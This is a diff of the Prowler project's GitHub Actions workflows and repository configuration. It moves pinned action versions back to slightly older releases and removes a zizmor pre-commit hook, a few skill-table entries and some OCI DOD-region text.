+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -27,14 +27,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check if Dockerfile changed
        id: dockerfile-changed
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: Dockerfile

@@ -65,14 +65,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for SDK changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: ./**
          files_ignore: |
@@ -101,7 +101,7 @@ jobs:

      - name: Build SDK container for ${{ matrix.arch }}
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2
+        uses: docker/build-push-action@263435318d21b8e681c14492fe198d362a7d2c83 # v6.18.0
        with:
          context: .
          push: false
@@ -59,7 +59,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -67,7 +67,7 @@ jobs:
        run: pipx install poetry==2.1.1

      - name: Set up Python ${{ env.PYTHON_VERSION }}
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
        with:
          python-version: ${{ env.PYTHON_VERSION }}

@@ -92,7 +92,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -100,7 +100,7 @@ jobs:
        run: pipx install poetry==2.1.1

      - name: Set up Python ${{ env.PYTHON_VERSION }}
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
        with:
          python-version: ${{ env.PYTHON_VERSION }}

@@ -25,13 +25,13 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          ref: 'master'
          persist-credentials: false

      - name: Set up Python ${{ env.PYTHON_VERSION }}
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
        with:
          python-version: ${{ env.PYTHON_VERSION }}
          cache: 'pip'
@@ -40,7 +40,7 @@ jobs:
        run: pip install boto3

      - name: Configure AWS credentials
-        uses: aws-actions/configure-aws-credentials@8df5847569e6427dd6c4fb1cf565c83acfa8afa7 # v6.0.0
+        uses: aws-actions/configure-aws-credentials@61815dcd50bd041e203e49132bacad1fd04d2708 # v5.1.1
        with:
          aws-region: ${{ env.AWS_REGION }}
          role-to-assume: ${{ secrets.DEV_IAM_ROLE_ARN }}
@@ -51,7 +51,7 @@ jobs:

      - name: Create pull request
        id: create-pr
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
          author: 'prowler-bot <179230569+prowler-bot@users.noreply.github.com>'
@@ -23,13 +23,13 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          ref: 'master'
          persist-credentials: false

      - name: Set up Python ${{ env.PYTHON_VERSION }}
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
        with:
          python-version: ${{ env.PYTHON_VERSION }}
          cache: 'pip'
@@ -48,7 +48,7 @@ jobs:

      - name: Create pull request
        id: create-pr
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
          author: 'prowler-bot <179230569+prowler-bot@users.noreply.github.com>'
@@ -72,13 +72,12 @@ jobs:
            This PR updates the `OCI_COMMERCIAL_REGIONS` dictionary in `prowler/providers/oraclecloud/config.py` with the latest regions fetched from the OCI Identity API (`list_regions()`).

            - Government regions (`OCI_GOVERNMENT_REGIONS`) are preserved unchanged
-            - DOD regions (`OCI_US_DOD_REGIONS`) are preserved unchanged
            - Region display names are mapped from Oracle's official documentation

            ### Checklist

            - [x] This is an automated update from OCI official sources
-            - [x] Government regions (us-langley-1, us-luke-1) and DOD regions (us-gov-ashburn-1, us-gov-phoenix-1, us-gov-chicago-1) are preserved
+            - [x] Government regions (us-langley-1, us-luke-1) preserved
            - [x] No manual review of region data required

            ### License
@@ -24,14 +24,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for SDK changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files:
            ./**
@@ -62,7 +62,7 @@ jobs:

      - name: Set up Python 3.12
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
        with:
          python-version: '3.12'
          cache: 'poetry'
@@ -31,14 +31,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for SDK changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: ./**
          files_ignore: |
@@ -67,7 +67,7 @@ jobs:

      - name: Set up Python ${{ matrix.python-version }}
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
        with:
          python-version: ${{ matrix.python-version }}
          cache: 'poetry'
@@ -80,7 +80,7 @@ jobs:
      - name: Check if AWS files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-aws
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/aws/**
@@ -210,7 +210,7 @@ jobs:
      - name: Check if Azure files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-azure
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/azure/**
@@ -234,7 +234,7 @@ jobs:
      - name: Check if GCP files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-gcp
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/gcp/**
@@ -258,7 +258,7 @@ jobs:
      - name: Check if Kubernetes files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-kubernetes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/kubernetes/**
@@ -282,7 +282,7 @@ jobs:
      - name: Check if GitHub files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-github
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/github/**
@@ -306,7 +306,7 @@ jobs:
      - name: Check if NHN files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-nhn
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/nhn/**
@@ -330,7 +330,7 @@ jobs:
      - name: Check if M365 files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-m365
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/m365/**
@@ -354,7 +354,7 @@ jobs:
      - name: Check if IaC files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-iac
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/iac/**
@@ -378,7 +378,7 @@ jobs:
      - name: Check if MongoDB Atlas files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-mongodbatlas
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/mongodbatlas/**
@@ -402,7 +402,7 @@ jobs:
      - name: Check if OCI files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-oraclecloud
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/oraclecloud/**
@@ -426,7 +426,7 @@ jobs:
      - name: Check if OpenStack files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-openstack
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/openstack/**
@@ -450,7 +450,7 @@ jobs:
      - name: Check if Google Workspace files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-googleworkspace
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/**/googleworkspace/**
@@ -474,7 +474,7 @@ jobs:
      - name: Check if Lib files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-lib
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/lib/**
@@ -498,7 +498,7 @@ jobs:
      - name: Check if Config files changed
        if: steps.check-changes.outputs.any_changed == 'true'
        id: changed-config
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ./prowler/config/**
@@ -48,17 +48,17 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Get changed files
        id: changed-files
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1

      - name: Setup Python
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@0b93645e9fea7318ecaed2b359559ac225c90a2b # v5.3.0
        with:
          python-version: '3.12'

@@ -67,7 +67,7 @@ jobs:
      pull-requests: write
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -95,7 +95,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for next minor version to master
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -117,7 +117,7 @@ jobs:
            By submitting this pull request, I confirm that my contribution is made under the terms of the Apache 2.0 license.

      - name: Checkout version branch
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          ref: v${{ needs.detect-release-type.outputs.major_version }}.${{ needs.detect-release-type.outputs.minor_version }}
          persist-credentials: false
@@ -149,7 +149,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for first patch version to version branch
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -180,7 +180,7 @@ jobs:
      pull-requests: write
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -214,7 +214,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for next patch version to version branch
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -45,17 +45,17 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

      - name: Initialize CodeQL
-        uses: github/codeql-action/init@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4.32.4
+        uses: github/codeql-action/init@5d4e8d1aca955e8d8589aabd499c5cae939e33c7 # v4.31.9
        with:
          languages: ${{ matrix.language }}
          config-file: ./.github/codeql/ui-codeql-config.yml

      - name: Perform CodeQL Analysis
-        uses: github/codeql-action/analyze@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4.32.4
+        uses: github/codeql-action/analyze@5d4e8d1aca955e8d8589aabd499c5cae939e33c7 # v4.31.9
        with:
          category: '/language:${{ matrix.language }}'
@@ -59,7 +59,7 @@ jobs:
      message-ts: ${{ steps.slack-notification.outputs.ts }}
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -97,12 +97,12 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

      - name: Login to DockerHub
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
@@ -113,7 +113,7 @@ jobs:
      - name: Build and push UI container for ${{ matrix.arch }}
        id: container-push
        if: github.event_name == 'push' || github.event_name == 'release' || github.event_name == 'workflow_dispatch'
-        uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2
+        uses: docker/build-push-action@263435318d21b8e681c14492fe198d362a7d2c83 # v6.18.0
        with:
          context: ${{ env.WORKING_DIRECTORY }}
          build-args: |
@@ -134,7 +134,7 @@ jobs:

    steps:
      - name: Login to DockerHub
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
@@ -185,7 +185,7 @@ jobs:
    timeout-minutes: 5
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -28,14 +28,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check if Dockerfile changed
        id: dockerfile-changed
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: ui/Dockerfile

@@ -66,14 +66,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for UI changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: ui/**
          files_ignore: |
@@ -87,7 +87,7 @@ jobs:

      - name: Build UI container for ${{ matrix.arch }}
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2
+        uses: docker/build-push-action@263435318d21b8e681c14492fe198d362a7d2c83 # v6.18.0
        with:
          context: ${{ env.UI_WORKING_DIR }}
          target: prod
@@ -78,7 +78,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -152,7 +152,7 @@ jobs:
          '

      - name: Setup Node.js
-        uses: actions/setup-node@6044e13b5dc448c55e2357c09f80417699197238 # v6.2.0
+        uses: actions/setup-node@395ad3262231945c25e8478fd5baf05154b1d79f # v6.1.0
        with:
          node-version: '24.13.0'

@@ -166,7 +166,7 @@ jobs:
        run: echo "STORE_PATH=$(pnpm store path --silent)" >> $GITHUB_ENV

      - name: Setup pnpm and Next.js cache
-        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+        uses: actions/cache@9255dc7a253b0ccc959486e2bca901246202afeb # v5.0.1
        with:
          path: |
            ${{ env.STORE_PATH }}
@@ -186,7 +186,7 @@ jobs:
        run: pnpm run build

      - name: Cache Playwright browsers
-        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+        uses: actions/cache@9255dc7a253b0ccc959486e2bca901246202afeb # v5.0.1
        id: playwright-cache
        with:
          path: ~/.cache/ms-playwright
@@ -30,14 +30,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for UI changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ui/**
@@ -50,7 +50,7 @@ jobs:
      - name: Get changed source files for targeted tests
        id: changed-source
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ui/**/*.ts
@@ -66,7 +66,7 @@ jobs:
      - name: Check for critical path changes (run all tests)
        id: critical-changes
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            ui/lib/**
@@ -78,7 +78,7 @@ jobs:

      - name: Setup Node.js ${{ env.NODE_VERSION }}
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: actions/setup-node@6044e13b5dc448c55e2357c09f80417699197238 # v6.2.0
+        uses: actions/setup-node@395ad3262231945c25e8478fd5baf05154b1d79f # v6.1.0
        with:
          node-version: ${{ env.NODE_VERSION }}

@@ -96,7 +96,7 @@ jobs:

      - name: Setup pnpm and Next.js cache
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+        uses: actions/cache@9255dc7a253b0ccc959486e2bca901246202afeb # v5.0.1
        with:
          path: |
            ${{ env.STORE_PATH }}
@@ -163,6 +163,3 @@ GEMINI.md
 .codex/skills
 .github/skills
 .gemini/skills
-
-# Claude Code
-.claude/*
@@ -22,13 +22,6 @@ repos:
        args: [--autofix]
        files: pyproject.toml

-  ## GITHUB ACTIONS
-  - repo: https://github.com/zizmorcore/zizmor-pre-commit
-    rev: v1.6.0
-    hooks:
-      - id: zizmor
-        files: ^\.github/
-
  ## BASH
  - repo: https://github.com/koalaman/shellcheck-precommit
    rev: v0.10.0
@@ -127,8 +120,7 @@ repos:
        description: "Safety is a tool that checks your installed dependencies for known security vulnerabilities"
        # TODO: Botocore needs urllib3 1.X so we need to ignore these vulnerabilities 77744,77745. Remove this once we upgrade to urllib3 2.X
        # TODO: 79023 & 79027 knack ReDoS until `azure-cli-core` (via `cartography`) allows `knack` >=0.13.0
-        # TODO: 86217 because `alibabacloud-tea-openapi == 0.4.3` don't let us upgrade `cryptography >= 46.0.0`
-        entry: bash -c 'safety check --ignore 70612,66963,74429,76352,76353,77744,77745,79023,79027,86217'
+        entry: bash -c 'safety check --ignore 70612,66963,74429,76352,76353,77744,77745,79023,79027'
        language: system

      - id: vulture
@@ -46,8 +46,6 @@ Use these skills for detailed patterns on-demand:
 | `prowler-commit` | Professional commits (conventional-commits) | [SKILL.md](skills/prowler-commit/SKILL.md) |
 | `prowler-pr` | Pull request conventions | [SKILL.md](skills/prowler-pr/SKILL.md) |
 | `prowler-docs` | Documentation style guide | [SKILL.md](skills/prowler-docs/SKILL.md) |
-| `django-migration-psql` | Django migration best practices for PostgreSQL | [SKILL.md](skills/django-migration-psql/SKILL.md) |
-| `postgresql-indexing` | PostgreSQL indexing, EXPLAIN, monitoring, maintenance | [SKILL.md](skills/postgresql-indexing/SKILL.md) |
 | `prowler-attack-paths-query` | Create Attack Paths openCypher queries | [SKILL.md](skills/prowler-attack-paths-query/SKILL.md) |
 | `gh-aw` | GitHub Agentic Workflows (gh-aw) | [SKILL.md](skills/gh-aw/SKILL.md) |
 | `skill-creator` | Create new AI agent skills | [SKILL.md](skills/skill-creator/SKILL.md) |
@@ -87,15 +85,15 @@ When performing these actions, ALWAYS invoke the corresponding skill FIRST:
 | Fixing bug | `tdd` |
 | General Prowler development questions | `prowler` |
 | Implementing JSON:API endpoints | `django-drf` |
-| Implementing feature | `tdd` |
 | Importing Copilot Custom Agents into workflows | `gh-aw` |
+| Implementing feature | `tdd` |
 | Inspect PR CI checks and gates (.github/workflows/*) | `prowler-ci` |
 | Inspect PR CI workflows (.github/workflows/*): conventional-commit, pr-check-changelog, pr-conflict-checker, labeler | `prowler-pr` |
 | Mapping checks to compliance controls | `prowler-compliance` |
 | Mocking AWS with moto in tests | `prowler-test-sdk` |
 | Modifying API responses | `jsonapi` |
-| Modifying component | `tdd` |
 | Modifying gh-aw workflow frontmatter or safe-outputs | `gh-aw` |
+| Modifying component | `tdd` |
 | Refactoring code | `tdd` |
 | Regenerate AGENTS.md Auto-invoke tables (sync.sh) | `skill-sync` |
 | Review PR requirements: template, title conventions, changelog gate | `prowler-pr` |
@@ -4,8 +4,6 @@
 > - [`prowler-api`](../skills/prowler-api/SKILL.md) - Models, Serializers, Views, RLS patterns
 > - [`prowler-test-api`](../skills/prowler-test-api/SKILL.md) - Testing patterns (pytest-django)
 > - [`prowler-attack-paths-query`](../skills/prowler-attack-paths-query/SKILL.md) - Attack Paths openCypher queries
-> - [`django-migration-psql`](../skills/django-migration-psql/SKILL.md) - Migration best practices for PostgreSQL
-> - [`postgresql-indexing`](../skills/postgresql-indexing/SKILL.md) - PostgreSQL indexing, EXPLAIN, monitoring, maintenance
 > - [`django-drf`](../skills/django-drf/SKILL.md) - Generic DRF patterns
 > - [`jsonapi`](../skills/jsonapi/SKILL.md) - Strict JSON:API v1.1 spec compliance
 > - [`pytest`](../skills/pytest/SKILL.md) - Generic pytest patterns
@@ -18,20 +16,14 @@ When performing these actions, ALWAYS invoke the corresponding skill FIRST:
 |--------|-------|
 | Add changelog entry for a PR or feature | `prowler-changelog` |
 | Adding DRF pagination or permissions | `django-drf` |
-| Adding indexes or constraints to database tables | `django-migration-psql` |
 | Adding privilege escalation detection queries | `prowler-attack-paths-query` |
-| Analyzing query performance with EXPLAIN | `postgresql-indexing` |
 | Committing changes | `prowler-commit` |
 | Create PR that requires changelog entry | `prowler-changelog` |
 | Creating API endpoints | `jsonapi` |
 | Creating Attack Paths queries | `prowler-attack-paths-query` |
 | Creating ViewSets, serializers, or filters in api/ | `django-drf` |
 | Creating a git commit | `prowler-commit` |
-| Creating or modifying PostgreSQL indexes | `postgresql-indexing` |
-| Creating or reviewing Django migrations | `django-migration-psql` |
 | Creating/modifying models, views, serializers | `prowler-api` |
-| Debugging slow queries or missing indexes | `postgresql-indexing` |
